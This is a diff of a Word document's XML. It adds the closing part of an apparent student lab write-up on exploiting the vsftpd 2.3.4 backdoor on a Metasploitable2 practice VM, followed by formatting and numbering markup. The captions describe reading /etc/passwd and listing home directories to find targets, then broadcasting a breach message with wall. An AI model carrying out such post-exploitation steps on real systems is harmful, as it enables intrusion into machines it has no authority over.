+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4693698B" wp14:editId="2002D6D3">
+            <wp:extent cx="5943600" cy="5473700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1718751028" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1718751028" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="5473700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The command shows the contents of the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd file, which includes details about user accounts on the system. This file is critical for understanding user accounts and potential targets for further exploitation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2132FB22" wp14:editId="3BD8FE20">
+            <wp:extent cx="1952898" cy="1066949"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="741919390" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="741919390" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1952898" cy="1066949"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The commands navigate to the /home directory and list its contents, revealing directories for different users like ftp, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, service, and user. This step helps identify user-specific files and directories for further investigation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>From the images above you can see that we have successfully breached metasploitable2 and running commands to gain info</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and here is a message to the Metasploitable2 VM for confirmation:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">echo "We have successfully breached Metasploitable2 using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>" &gt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/breach_message.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>wall &lt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>/breach_message.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40C17C69" wp14:editId="59CEA5CE">
+            <wp:extent cx="4632960" cy="2331720"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1360203584" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1360203584" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId42"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4632960" cy="2331720"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">As you can see the message was sent using the wall command. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Conclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The process demonstrated the successful exploitation of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vsftpd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.3.4 vulnerability, gaining root access, and gathering sensitive system information. The steps involved setting up and executing the exploit, interacting with the session, and running various commands to verify access and explore the target system. This exercise highlights the importance of keeping software up-to-date and securing services against known vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
@@ -1750,6 +3696,294 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="01932241"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="8BFA5756"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000B">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7560" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0F987BCD"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="91C00D08"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="183718C2"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="15F4B96A"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="63F44F18"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76507AD6"/>
@@ -1861,7 +4095,105 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="75F5776B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="16307F44"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="2028368582">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="345597097">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="677775880">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="614946184">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="1718551328">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>

</xml_diff>